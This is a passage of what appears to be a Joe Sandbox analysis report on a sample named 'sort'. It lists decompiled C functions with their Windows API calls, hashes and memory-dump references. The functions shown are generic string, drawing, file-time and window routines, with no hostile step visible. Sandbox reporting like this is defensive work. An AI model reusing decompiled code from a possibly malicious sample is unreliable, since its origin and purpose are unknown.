									if(_t46 <= 1 || MultiByteToWideChar(_t30, 9, _t53, _t46, _a4, 0 | _a4 != 0x00000000) == 0) {
										if(_t53[1] != 0) {
											goto L19;
										}
										 *_t54 =  *_t54 & 0x00000000;
										goto L21;
									} else {
										L19:
										_t35 =  *0x43730c; // 0x1
										return _t35;
									}
								}
								 *_t54 = _t50;
								_push(0xfffffffe);
								goto L14;
							}
							_t54[1] = _t50;
							if( *0x43730c <= 1 || MultiByteToWideChar(_t30, 9, _t54, 2, _a4, 0 | _a4 != 0x00000000) == 0) {
								 *_t54 = 0;
								goto L21;
							} else {
								 *_t54 = 0;
								goto L19;
							}
						} else {
							_t38 = _a4;
							if(_t38 != 0) {
								 *_t38 = _t50 & 0x000000ff;
							}
							L13:
							_push(1);
							L14:
							_pop(_t32);
							return _t32;
						}
					} else {
						_t39 = _a4;
						if(_t39 != 0) {
							 *_t39 = 0;
						}
						goto L5;
					}
				}
			}

APIs

MultiByteToWideChar.KERNEL32(00000006,00000009,?,00000002,00000000,00000000,73B770F0,0043B508,00000000,?,0040EB26,00000000,00000002,?,?,?), ref: 0040EBC5
MultiByteToWideChar.KERNEL32(00000006,00000009,00000002,00000001,00000000,00000000,73B770F0,0043B508,00000000,?,0040EB26,00000000,00000002,?,?,?), ref: 0040EC21
MultiByteToWideChar.KERNEL32(00000006,00000009,00000002,00000001,00000000,00000000,73B770F0,0043B508,00000000,?,0040EB26,00000000,00000002,?,?,?), ref: 0040EC48

Strings

qC, xrefs: 0040EBEA

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: qC
API String ID: 626452242-723977305
Opcode ID: 9b978aa82f3ed8b50052fab243b56dbffd9d8b2fb8176b7af756b45fab2e9ea7
Instruction ID: c9bfa79667547676a2f9c640e0e00b1591e9fa3c2d1d8cd3a8b3004187d1f30f
Opcode Fuzzy Hash: 9b978aa82f3ed8b50052fab243b56dbffd9d8b2fb8176b7af756b45fab2e9ea7
Instruction Fuzzy Hash: FC31A070204206EFDB20CF22DCC4A6A3BB5AB41711F14893EE5439A2D1E378ECA1D759

Uniqueness

Uniqueness Score: -1.00%

Function 004040A0, Relevance: 6.1, APIs: 4, Instructions: 101
windowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E004040A0(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, signed int _a28, signed int _a32, intOrPtr _a36, signed int _a40) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _t83;
				signed int _t85;
				void* _t126;
				void* _t128;

				if(_a40 < 4) {
					_a40 = 4;
				}
				asm("cdq");
				_v8 = _a28 / _a40 + 1;
				asm("cdq");
				_v12 = _a32 / _a40 + 1;
				E004061D5(E00406204(0));
				_t128 = _t126 + 8;
				_v16 = _v8 * _v12;
				while(_v16 > 0) {
					_t83 = E004061E2();
					asm("cdq");
					_v20 = _t83 % _v8;
					_t85 = E004061E2();
					asm("cdq");
					_v24 = _t85 % _v12;
					BitBlt(_a16, _a20 + _v20 * _a40, _a24 + _v24 * _a40, _a40, _a40, _a4, _a8 + _v20 * _a40, _a12 + _v24 * _a40, 0xcc0020);
					asm("cdq");
					if(_v16 % 0xa == 0) {
						E0040381D(_a36);
						_t128 = _t128 + 4;
					}
					_v16 = _v16 - 1;
				}
				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
				return 1;
			}

APIs

_rand.LIBCMT ref: 004040F4
_rand.LIBCMT ref: 00404100
BitBlt.GDI32(?,?,?,?,?,?,00000000,?,00CC0020), ref: 00404155
BitBlt.GDI32(?,?,?,00CC0020,?,?,00000000,?,00CC0020), ref: 004041A9

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: _rand
String ID:
API String ID: 1172538735-0
Opcode ID: a2d48083adc6e386331021ddbb1d8997b7df1032238b4ade521697a42fa36f33
Instruction ID: ed2ed6788aa4e0fa1879982426311b249628acefad2a4dc112bdad2b7b6bc882
Opcode Fuzzy Hash: a2d48083adc6e386331021ddbb1d8997b7df1032238b4ade521697a42fa36f33
Instruction Fuzzy Hash: C83107B5A00109EFCB04DF99C985EEE77B9EF9C308F118269F919A7240D634EA10CF95

Uniqueness

Uniqueness Score: -1.00%

Function 004293D9, Relevance: 6.1, APIs: 4, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004293D9(void* __ecx) {
				INT* _t43;
				CHAR* _t44;
				CHAR* _t47;
				CHAR* _t65;
				void* _t76;
				void* _t81;
				void* _t83;

				E00406520(E0042A890, _t81);
				_t43 =  *(_t81 + 0x20);
				_t65 = 0;
				 *((intOrPtr*)(_t81 - 0x10)) = _t83 - 0x20;
				_t76 = __ecx;
				 *(_t81 - 0x14) = 0;
				 *((intOrPtr*)(_t81 - 0x18)) = 0;
				if(_t43 != 0) {
					L4:
					_t44 = ExtTextOutA( *(_t76 + 4),  *(_t81 + 8),  *(_t81 + 0xc),  *(_t81 + 0x10),  *(_t81 + 0x14),  *(_t81 + 0x18),  *(_t81 + 0x1c), _t43);
					 *(_t81 + 0x18) = _t44;
					if( *((intOrPtr*)(_t81 - 0x18)) != 0 && _t44 != 0 && (GetTextAlign( *(_t76 + 8)) & 0x00000001) != 0) {
						GetCurrentPositionEx( *(_t76 + 4), _t81 - 0x20);
						E0041A1BF(_t76, _t81 - 0x28,  *(_t81 - 0x20) -  *((intOrPtr*)(_t81 - 0x18)),  *((intOrPtr*)(_t81 - 0x1c)));
					}
					E00413206( *(_t81 - 0x14));
					E00413206(_t65);
					_t47 =  *(_t81 + 0x18);
				} else {
					if( *(_t81 + 0x1c) != 0) {
						 *(_t81 - 4) = 0;
						 *(_t81 - 0x14) = E004131DD( *(_t81 + 0x1c) << 2);
						_t65 = E004131DD( *(_t81 + 0x1c));
						 *(_t81 - 4) =  *(_t81 - 4) | 0xffffffff;
						E0042914E(_t76, _t81 - 0x20, _t81 + 8,  *(_t81 + 0x18), _t81 + 0x1c, 0, 0, 0, 0, _t65,  *(_t81 - 0x14), _t81 - 0x18);
						_t43 =  *(_t81 - 0x14);
						 *(_t81 + 0x18) = _t65;
						goto L4;
					} else {
						_t47 = 1;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t81 - 0xc));
				return _t47;
			}

APIs

__EH_prolog.LIBCMT ref: 004293DE
ExtTextOutA.GDI32(?,?,?,?,?,?,?,?), ref: 0042946C
GetTextAlign.GDI32(?), ref: 00429481
GetCurrentPositionEx.GDI32(?,?), ref: 00429492

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Text$AlignCurrentH_prologPosition
String ID:
API String ID: 2331262098-0
Opcode ID: ba3f12c094f1310c0665f5f126d81fc9c6abdaded98a66113d688dd55281fba0
Instruction ID: d4a08c63824a92c840afe16e88adb87e11ee856b7d6374c0f69a009a87428bbd
Opcode Fuzzy Hash: ba3f12c094f1310c0665f5f126d81fc9c6abdaded98a66113d688dd55281fba0
Instruction Fuzzy Hash: 60311872A0411AAFCF219F95DC45CEF7F79FF08350F10411AF915A2250C7399A61DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004181F2, Relevance: 6.1, APIs: 4, Instructions: 85
stringtimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004181F2(void* __ecx, char _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				void* _t29;
				void* _t30;
				long _t33;
				long _t34;
				intOrPtr _t43;
				signed int _t45;
				signed int _t46;
				void* _t54;
				CHAR* _t55;
				intOrPtr* _t56;

				_t56 = _a4;
				_t54 = __ecx;
				E00406330(_t56, 0, 0x118);
				_t2 = _t56 + 0x12; // 0x4181ee
				lstrcpynA(_t2,  *(_t54 + 0xc), 0x104);
				_t29 =  *(_t54 + 4);
				_t46 = _t45 | 0xffffffff;
				if(_t29 == _t46) {
					L12:
					_t30 = 1;
					return _t30;
				}
				if(GetFileTime(_t29,  &_v12,  &_v20,  &_v28) == 0) {
					L3:
					return 0;
				}
				_t33 = GetFileSize( *(_t54 + 4), 0);
				 *(_t56 + 0xc) = _t33;
				if(_t33 != _t46) {
					_t55 =  *(_t54 + 0xc);
					if( *((intOrPtr*)(_t55 - 8)) != 0) {
						_t34 = GetFileAttributesA(_t55);
						if(_t34 == _t46) {
							goto L5;
						}
						 *(_t56 + 0x10) = _t34;
						L8:
						 *_t56 =  *((intOrPtr*)(E00410A21( &_a4,  &_v12, _t46)));
						 *((intOrPtr*)(_t56 + 8)) =  *((intOrPtr*)(E00410A21( &_a4,  &_v20, _t46)));
						_t43 =  *((intOrPtr*)(E00410A21( &_a4,  &_v28, _t46)));
						 *((intOrPtr*)(_t56 + 4)) = _t43;
						if( *_t56 == 0) {
							 *_t56 = _t43;
						}
						if( *((intOrPtr*)(_t56 + 8)) == 0) {
							_t24 = _t56 + 4; // 0xfffef685
							 *((intOrPtr*)(_t56 + 8)) =  *_t24;
						}
						goto L12;
					}
					L5:
					 *(_t56 + 0x10) =  *(_t56 + 0x10) & 0x00000000;
					goto L8;
				}
				goto L3;
			}

APIs

lstrcpynA.KERNEL32(004181EE,?,00000104,?,?,?,?,?,?,?,004181DC,?), ref: 0041821C
GetFileTime.KERNEL32(00000000,004181DC,?,?,?,?,?,?,?,?,?,004181DC,?), ref: 0041823D
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,004181DC,?), ref: 0041824C
GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,004181DC,?), ref: 0041826D

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: File$AttributesSizeTimelstrcpyn
String ID:
API String ID: 1499663573-0
Opcode ID: dbecba43a928303c581e8da2cb8fd19ac9e6fcc8953e2d36976d88af1ab38ca6
Instruction ID: 4fe2cb551854f978d009958c1be7b26df4981621a34b5ca5644a38b106d1dacc
Opcode Fuzzy Hash: dbecba43a928303c581e8da2cb8fd19ac9e6fcc8953e2d36976d88af1ab38ca6
Instruction Fuzzy Hash: 2D318F76600605AFC721DFA0C885BEBB7B8FF24310F10496EE556D7290EB74A985CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00421DA3, Relevance: 6.1, APIs: 4, Instructions: 74
stringCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00421DA3() {
				intOrPtr _t25;
				struct HWND__* _t26;
				struct HWND__* _t43;
				struct HWND__** _t50;
				void* _t52;

				E00406520(E0042A3D8, _t52);
				_t25 =  *0x436980; // 0x436994
				 *((intOrPtr*)(_t52 - 0x10)) = _t25;
				_t50 =  *(_t52 + 0xc);
				_t26 = _t50[2];
				_t43 = _t50[1];
				 *(_t52 - 4) = 0;
				if(_t26 != 0xfffffdf8 || (_t50[0x19] & 0x00000001) == 0) {
					if(_t26 == 0xfffffdee && (_t50[0x2d] & 0x00000001) != 0) {
						goto L4;
					}
				} else {
					L4:
					_t43 = GetDlgCtrlID(_t43) & 0x0000ffff;
				}
				if(_t43 == 0) {
					L8:
					_push(0x50);
					_push( *((intOrPtr*)(_t52 - 0x10)));
					_push( &(_t50[4]));
					if(_t50[2] != 0xfffffdf8) {
						E00416D78();
					} else {
						lstrcpynA();
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t52 + 0x10)))) = 0;
					SetWindowPos( *_t50, 0, 0, 0, 0, 0, 0x213);
					_push(1);
					_pop(0);
				} else {
					if(E00417298(_t43, _t52 - 0x110, 0x100) != 0) {
						E004172BF(_t52 - 0x10, _t52 - 0x110, 1, 0xa);
						goto L8;
					}
				}
				 *(_t52 - 4) =  *(_t52 - 4) | 0xffffffff;
				E00416AEC(_t52 - 0x10);
				 *[fs:0x0] =  *((intOrPtr*)(_t52 - 0xc));
				return 0;
			}

APIs

__EH_prolog.LIBCMT ref: 00421DA8
GetDlgCtrlID.USER32 ref: 00421DEC
lstrcpynA.KERNEL32(?,?,00000050), ref: 00421E31
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 00421E52

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: CtrlH_prologWindowlstrcpyn
String ID:
API String ID: 2888839504-0
Opcode ID: e883827794f995750d8e0748482c4f524e8e7c9e824d21524573c760b701934f
Instruction ID: 51cd8aa0e5dd28eac912709b930bb33ded5dc075b1ee3252d35fc9d3b9766125
Opcode Fuzzy Hash: e883827794f995750d8e0748482c4f524e8e7c9e824d21524573c760b701934f
Instruction Fuzzy Hash: D8219071600215ABCB30DB65DC85BABB7B8BF14314F44452EF952922E0D3B4A940CA14

Uniqueness

Uniqueness Score: -1.00%

Function 0040BF2C, Relevance: 6.1, APIs: 4, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040BF2C(void* __ecx) {
				int _t30;
				void* _t40;
				int _t42;
				short* _t44;
				int _t45;
				int _t48;
				void* _t49;
				short* _t51;

				_t40 = __ecx;
				_t51 =  *(_t49 - 0x18);
				 *(_t49 - 0x24) = 0;
				 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
				_t45 =  *(_t49 + 0x14);
				_t42 = 1;
				if( *(_t49 - 0x24) == 0 || MultiByteToWideChar( *(_t49 + 0x20), _t42,  *(_t49 + 0x10), _t45,  *(_t49 - 0x24),  *(_t49 - 0x1c)) == 0) {
					L8:
					_t30 = 0;
				} else {
					_t48 = MultiByteToWideChar( *(_t49 + 0x20), 9,  *(_t49 + 0x18),  *(_t49 + 0x1c), 0, 0);
					 *(_t49 - 0x20) = _t48;
					if(_t48 == 0) {
						goto L8;
					} else {
						 *(_t49 - 4) = _t42;
						E00406830(_t48 + _t48 + 0x00000003 & 0x000000fc, _t40);
						 *(_t49 - 0x18) = _t51;
						_t44 = _t51;
						 *(_t49 - 0x28) = _t44;
						 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
						if(_t44 == 0 || MultiByteToWideChar( *(_t49 + 0x20), 1,  *(_t49 + 0x18),  *(_t49 + 0x1c), _t44, _t48) == 0) {
							goto L8;
						} else {
							_t30 = CompareStringW( *(_t49 + 8),  *(_t49 + 0xc),  *(_t49 - 0x24),  *(_t49 - 0x1c), _t44, _t48);
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t49 - 0x10));
				return _t30;
			}

APIs

MultiByteToWideChar.KERNEL32(?,00000001,00000000,0000000B,?,?,?,0040A577), ref: 0040BF5B
MultiByteToWideChar.KERNEL32(00000000,00000009,?,00000000,00000000,00000000,?,0040A577), ref: 0040BF6E
MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,?,00000000,?,0040A577), ref: 0040BFBA
CompareStringW.KERNEL32(?,?,00000000,00000000,?,00000000,?,00000000,?,0040A577), ref: 0040BFD2

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: ByteCharMultiWide$CompareString
String ID:
API String ID: 376665442-0
Opcode ID: 457da201d333a445e7be22f73c5e8df3eb2b5babfed425308593c8da7e39ea65
Instruction ID: 5efc645efc17fcc534c18c6f6ed6037a474d66dfe24f988aec16bcf1503d57bf
Opcode Fuzzy Hash: 457da201d333a445e7be22f73c5e8df3eb2b5babfed425308593c8da7e39ea65
Instruction Fuzzy Hash: 3621FA3290021AEBCF218F84CD459DE7FB6FB48750F10416AFA11B21A0C3359962DB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041837E, Relevance: 6.1, APIs: 4, Instructions: 66
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041837E(intOrPtr _a4, struct _FILETIME* _a8) {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				int _t36;
				void* _t50;

				_t47 = _a4;
				_v28.wYear =  *((intOrPtr*)(E00410A6D(_a4, 0, 0) + 0x14)) + 0x76c;
				_v28.wMonth =  *((intOrPtr*)(E00410A6D(_t47, 0, 0) + 0x10)) + 1;
				_v28.wDay =  *((intOrPtr*)(E00410A6D(_t47, 0, 0) + 0xc));
				_v28.wHour =  *((intOrPtr*)(E00410A6D(_t47, 0, 0) + 8));
				_v28.wMinute =  *((intOrPtr*)(E00410A6D(_t47, 0, 0) + 4));
				_t30 = E00410A6D(_t47, 0, 0);
				_v28.wMilliseconds = 0;
				_v28.wSecond =  *_t30;
				if(SystemTimeToFileTime( &_v28,  &_v12) == 0) {
					E00417D15(_t50, GetLastError(), 0);
				}
				_t36 = LocalFileTimeToFileTime( &_v12, _a8);
				if(_t36 == 0) {
					return E00417D15(_t50, GetLastError(), 0);
				}
				return _t36;
			}

0x00418386
0x0041839e
0x004183ae
0x004183be
0x004183ce
0x004183de
0x004183e2
0x004183ea
0x004183ee
0x00418408
0x0041840e
0x0041840e
0x0041841a
0x00418422
0x00000000
0x00418428
0x00418430

APIs

SystemTimeToFileTime.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004183FA
GetLastError.KERNEL32(00000000), ref: 0041840B
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0041841A
GetLastError.KERNEL32(00000000), ref: 00418425

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Time$File$ErrorLast$LocalSystem
String ID:
API String ID: 1172841412-0
Opcode ID: 77e8b690d52222c06148fd2690c6150cb9e48df62c9af10ae8d967d673f72f3a
Instruction ID: 69ffd75d0e39b7352c5362a2be2b2db12d62653dc9023d602915fa8a64db73ca
Opcode Fuzzy Hash: 77e8b690d52222c06148fd2690c6150cb9e48df62c9af10ae8d967d673f72f3a
Instruction Fuzzy Hash: 2F11542AA10319A6CF00BBE698059EFB7BDEF94744B04405BF51197222EB78D6C187ED

Uniqueness

Uniqueness Score: -1.00%

Function 00427D03, Relevance: 6.1, APIs: 4, Instructions: 64
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00427D03(void* __ecx) {
				CHAR* _t35;
				void* _t40;
				CHAR* _t49;
				CHAR* _t55;
				signed int _t56;
				void* _t61;

				E00406520(E0042A190, _t61);
				_t49 =  *(_t61 + 8);
				_t55 =  *(_t61 + 0xc);
				 *(_t61 + 0xc) =  &(_t49[_t55 - 1]);
				 *((intOrPtr*)(_t61 - 0x10)) =  *((intOrPtr*)(E004126FB() + 0x1c));
				_t56 = 0 | _t55 != 0x00000001;
				_t35 =  *0x436980; // 0x436994
				 *(_t61 + 8) = _t35;
				 *(_t61 - 4) =  *(_t61 - 4) & 0x00000000;
				if(E004172BF(_t61 + 8,  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x114)) + 0x1c)), _t56, 0xa) != 0) {
					if(_t56 != 0) {
						wsprintfA(_t61 - 0x60,  *(_t61 + 8), _t49,  *(_t61 + 0xc));
					} else {
						wsprintfA(_t61 - 0x60,  *(_t61 + 8), _t49);
					}
					SendMessageA( *( *((intOrPtr*)(_t61 - 0x10)) + 0x1c), 0x362, 0, _t61 - 0x60);
				}
				 *(_t61 - 4) =  *(_t61 - 4) | 0xffffffff;
				_t40 = E00416AEC(_t61 + 8);
				 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0xc));
				return _t40;
			}

APIs

__EH_prolog.LIBCMT ref: 00427D08

Part of subcall function 004172BF: lstrlenA.KERNEL32(?), ref: 00417303

wsprintfA.USER32 ref: 00427D69
wsprintfA.USER32 ref: 00427D7F
SendMessageA.USER32(?,00000362,00000000,?), ref: 00427D99

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: wsprintf$H_prologMessageSendlstrlen
String ID:
API String ID: 443212507-0
Opcode ID: 7f582531f965cc17da0ee5c9b4071f69e8f9433dc37d9febc509c367a3985e73
Instruction ID: 7ff1a3cc2775f07db174e29478699fd29c516c00f85defca4782343cc9fd23cc
Opcode Fuzzy Hash: 7f582531f965cc17da0ee5c9b4071f69e8f9433dc37d9febc509c367a3985e73
Instruction Fuzzy Hash: 75214D76A00208ABCB11DFA8DC85ADEB7B9FF08354F018126F919DB251E734DA15CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0041F9E4, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0041F9E4(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				int _t21;
				intOrPtr _t32;
				int _t36;
				void* _t46;

				_push(__ecx);
				_push(__ecx);
				_t46 = __ecx;
				_t36 = _a4 -  *((intOrPtr*)(__ecx + 4));
				_t21 = _a8 -  *((intOrPtr*)(__ecx + 8));
				_v8 = _t21;
				OffsetRect(__ecx + 0x28, _t36, _t21);
				OffsetRect(_t46 + 0x48, _t36, _v8);
				OffsetRect(_t46 + 0x38, _t36, _v8);
				OffsetRect(_t46 + 0x58, _t36, _v8);
				_t48 =  *((intOrPtr*)(_t46 + 0x80));
				 *((intOrPtr*)(_t46 + 4)) = _a4;
				 *((intOrPtr*)(_t46 + 8)) = _a8;
				if( *((intOrPtr*)(_t46 + 0x80)) == 0) {
					_t32 = E004201E2();
				} else {
					_t32 = 0;
				}
				 *((intOrPtr*)(_t46 + 0x74)) = _t32;
				return E0042007A(_t46, _t48, 0);
			}

APIs

OffsetRect.USER32(?,?,?), ref: 0041FA0D
OffsetRect.USER32(?,?,?), ref: 0041FA17
OffsetRect.USER32(?,?,?), ref: 0041FA21
OffsetRect.USER32(?,?,?), ref: 0041FA2B

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: OffsetRect
String ID:
API String ID: 177026234-0
Opcode ID: 724412e346da52ef1abd13ebb36a31384d97fecc05aac676bbc0405bf4fe35f7
Instruction ID: 12d90742d37334e6a7f33d2c848e5a22a1ecdf716f2821100b5f1ee929164941
Opcode Fuzzy Hash: 724412e346da52ef1abd13ebb36a31384d97fecc05aac676bbc0405bf4fe35f7
Instruction Fuzzy Hash: 3C113C71600609AFDB20DFAAC984D9BBBECEF44344B00482EF54AC3650D674EE408B60

Uniqueness

Uniqueness Score: -1.00%

Function 00422C42, Relevance: 6.1, APIs: 4, Instructions: 55
windowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00422C42(void* __ecx) {
				void* __ebp;
				void* _t6;
				void* _t8;
				void* _t27;
				void* _t30;
				void* _t32;

				_t32 = __ecx;
				_t6 = E004136A7(__ecx);
				if(_t6 != 0) {
					if((E00416528(_t32) & 0x00000001) != 0) {
						_t27 = E00414CEF(_t32);
						_t30 = E00413740(_t32, GetForegroundWindow());
						if(_t27 == _t30 || E00413740(_t32, GetLastActivePopup( *(_t27 + 0x1c))) == _t30 && SendMessageA( *(_t30 + 0x1c), 0x36d, 0x40, 0) != 0) {
							_push(1);
							_pop(0);
						}
						asm("sbb eax, eax");
						SendMessageA( *(_t32 + 0x1c), 0x36d, 0xb4, 0);
					}
					_t8 = 1;
					return _t8;
				}
				return _t6;
			}

0x00422c43
0x00422c45
0x00422c4c
0x00422c58
0x00422c64
0x00422c78
0x00422c7c
0x00422ca7
0x00422ca9
0x00422ca9
0x00422cac
0x00422cbe
0x00422cc2
0x00422cc5
0x00000000
0x00422cc5
0x00422cc7

APIs

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

GetForegroundWindow.USER32 ref: 00422C66
GetLastActivePopup.USER32(?), ref: 00422C81
SendMessageA.USER32(?,0000036D,00000040,00000000), ref: 00422C9D
SendMessageA.USER32(?,0000036D,-00000007,00000000), ref: 00422CBE

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: MessageSendWindow$ActiveForegroundLastLongPopup
String ID:
API String ID: 2039223353-0
Opcode ID: 045ec56b260f3de9eff23e93b67e4b6a915aff67d248da42b0d3d9ef37d763b1
Instruction ID: 235acb9714286046b2b697988b516babaf9458fdd3923160d87edcd70ef93c92
Opcode Fuzzy Hash: 045ec56b260f3de9eff23e93b67e4b6a915aff67d248da42b0d3d9ef37d763b1
Instruction Fuzzy Hash: 2301F2723403153EEB212A73FD51FAE6209AB40B55F50083ABA01DA2D1DAADDD86416C

Uniqueness

Uniqueness Score: -1.00%

Function 00417748, Relevance: 6.1, APIs: 4, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00417748(void* __ecx, void* __esi) {
				void* _v8;
				void* __ebp;
